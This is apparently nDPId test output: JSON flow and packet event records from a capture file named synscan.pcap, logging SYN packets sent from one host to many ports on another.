-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":942,"source":"synscan.pcap","alias":"nDPId-test","flow_id":933,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsAsYAACwGGa2sEAAIQA2GNIzTDrbdU4MZAAAAAGACBAAl1gAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":943,"source":"synscan.pcap","alias":"nDPId-test","flow_id":934,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":943,"source":"synscan.pcap","alias":"nDPId-test","flow_id":934,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAslzwAADkGeDasEAAIQA2GNIzT2QPdU4MZAAAAAGACCABXiAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":944,"source":"synscan.pcap","alias":"nDPId-test","flow_id":935,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":944,"source":"synscan.pcap","alias":"nDPId-test","flow_id":935,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsAgkAACYGIGqsEAAIQA2GNIzTBF\/dU4MZAAAAAGACDAAoLQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":945,"source":"synscan.pcap","alias":"nDPId-test","flow_id":936,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":945,"source":"synscan.pcap","alias":"nDPId-test","flow_id":936,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsLeMAADoG4I+sEAAIQA2GNIzTC7\/dU4MZAAAAAGACDAAgzQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":946,"source":"synscan.pcap","alias":"nDPId-test","flow_id":937,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5560,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":946,"source":"synscan.pcap","alias":"nDPId-test","flow_id":937,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAs82YAADUGIAysEAAIQA2GNIzTFbjdU4MZAAAAAGACCAAa1AAAAgQFtA=="} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":947,"source":"synscan.pcap","alias":"nDPId-test","flow_id":938,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":981,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":947,"source":"synscan.pcap","alias":"nDPId-test","flow_id":938,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAskFEAACgGkCGsEAAIQA2GNIzTA9XdU4MZAAAAAGACBAAwtwAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":948,"source":"synscan.pcap","alias":"nDPId-test","flow_id":939,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":948,"source":"synscan.pcap","alias":"nDPId-test","flow_id":939,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAsF3sAACkGB\/isEAAIQA2GNIzTA4XdU4MZAAAAAGACCAAtBwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":949,"source":"synscan.pcap","alias":"nDPId-test","flow_id":940,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1864,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":949,"source":"synscan.pcap","alias":"nDPId-test","flow_id":940,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAssqYAADEGZMysEAAIQA2GNIzTB0jdU4MZAAAAAGACCAApRAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":950,"source":"synscan.pcap","alias":"nDPId-test","flow_id":941,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":950,"source":"synscan.pcap","alias":"nDPId-test","flow_id":941,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAs65AAADsGIeKsEAAIQA2GNIzTBAXdU4MZAAAAAGACEAAkhwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":951,"source":"synscan.pcap","alias":"nDPId-test","flow_id":942,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5987,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":951,"source":"synscan.pcap","alias":"nDPId-test","flow_id":942,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAsWb4AADEGvbSsEAAIQA2GNIzSF2PdUoMYAAAAAGACCAAZLAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":952,"source":"synscan.pcap","alias":"nDPId-test","flow_id":943,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":952,"source":"synscan.pcap","alias":"nDPId-test","flow_id":943,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAsQQkAAC4G2WmsEAAIQA2GNIzSJR7dUoMYAAAAAGACDAAHcQAAAgQFtA=="} 
-00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":953,"source":"synscan.pcap","alias":"nDPId-test","flow_id":944,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":953,"source":"synscan.pcap","alias":"nDPId-test","flow_id":944,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAsitoAADAGjZisEAAIQA2GNIzSAAHdUoMYAAAAAGACBAA0jgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":954,"source":"synscan.pcap","alias":"nDPId-test","flow_id":945,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":954,"source":"synscan.pcap","alias":"nDPId-test","flow_id":945,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAsvtQAADQGVZ6sEAAIQA2GNIzSBBbdUoMYAAAAAGACBAAweQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":955,"source":"synscan.pcap","alias":"nDPId-test","flow_id":946,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27715,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":955,"source":"synscan.pcap","alias":"nDPId-test","flow_id":946,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAsUaMAADoGvM+sEAAIQA2GNIzSbEPdUoMYAAAAAGACDADASwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":956,"source":"synscan.pcap","alias":"nDPId-test","flow_id":947,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":956,"source":"synscan.pcap","alias":"nDPId-test","flow_id":947,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAsx6gAADQGTMqsEAAIQA2GNIzSG1rdUoMYAAAAAGACBAAZNQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":957,"source":"synscan.pcap","alias":"nDPId-test","flow_id":948,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":28201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":957,"source":"synscan.pcap","alias":"nDPId-test","flow_id":948,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAsr\/8AACoGbnOsEAAIQA2GNIzSbindUoMYAAAAAGACDAC+ZQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":958,"source":"synscan.pcap","alias":"nDPId-test","flow_id":949,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1186,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":958,"source":"synscan.pcap","alias":"nDPId-test","flow_id":949,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAs6kgAACUGOSqsEAAIQA2GNIzSBKLdUoMYAAAAAGACCAAr7QAAAgQFtA=="} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":959,"source":"synscan.pcap","alias":"nDPId-test","flow_id":950,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":705,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":959,"source":"synscan.pcap","alias":"nDPId-test","flow_id":950,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/WEAADMGGBGsEAAIQA2GNIzSAsHdUoMYAAAAAGACEAAlzgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":960,"source":"synscan.pcap","alias":"nDPId-test","flow_id":951,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":960,"source":"synscan.pcap","alias":"nDPId-test","flow_id":951,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAsZ38AADoGpvOsEAAIQA2GNIzSB9ndUoMYAAAAAGACDAAktgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":961,"source":"synscan.pcap","alias":"nDPId-test","flow_id":952,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059957,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":64680,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":961,"source":"synscan.pcap","alias":"nDPId-test","flow_id":952,"flow_packet_id":1,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059957,"pkt":"ACYLMQczACWzv5HuCABFAAAs5XcAADsGJ\/usEAAIQA2GNIzS\/KjdUoMYAAAAAGACEAAr5gAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":962,"source":"synscan.pcap","alias":"nDPId-test","flow_id":953,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059957,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":962,"source":"synscan.pcap","alias":"nDPId-test","flow_id":953,"flow_packet_id":1,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059957,"pkt":"ACYLMQczACWzv5HuCABFAAAsxY4AADgGSuSsEAAIQA2GNIzSRrXdUoMYAAAAAGACBADt2QAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":963,"source":"synscan.pcap","alias":"nDPId-test","flow_id":954,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059957,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49158,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":963,"source":"synscan.pcap","alias":"nDPId-test","flow_id":954,"flow_packet_id":1,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059957,"pkt":"ACYLMQczACWzv5HuCABFAAAsdRAAADYGnWKsEAAIQA2GNIzSwAbdUoMYAAAAAGACDABsiAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":964,"source":"synscan.pcap","alias":"nDPId-test","flow_id":955,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059957,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3971,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":964,"source":"synscan.pcap","alias":"nDPId-test","flow_id":955,"flow_packet_id":1,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059957,"pkt":"ACYLMQczACWzv5HuCABFAAAsie4AADMGi4SsEAAIQA2GNIzSD4PdUoMYAAAAAGACEAAZDAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":965,"source":"synscan.pcap","alias":"nDPId-test","flow_id":956,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059957,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6689,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":965,"source":"synscan.pcap","alias":"nDPId-test","flow_id":956,"flow_packet_id":1,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059957,"pkt":"ACYLMQczACWzv5HuCABFAAAsUTQAADcGwD6sEAAIQA2GNIzSGiHdUoMYAAAAAGACEAAObgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":966,"source":"synscan.pcap","alias":"nDPId-test","flow_id":957,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059961,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4550,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":966,"source":"synscan.pcap","alias":"nDPId-test","flow_id":957,"flow_packet_id":1,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059961,"pkt":"ACYLMQczACWzv5HuCABFAAAsHoUAADMG9u2sEAAIQA2GNIzTEcbdU4MZAAAAAGACEAAWxgAAAgQFtA=="} 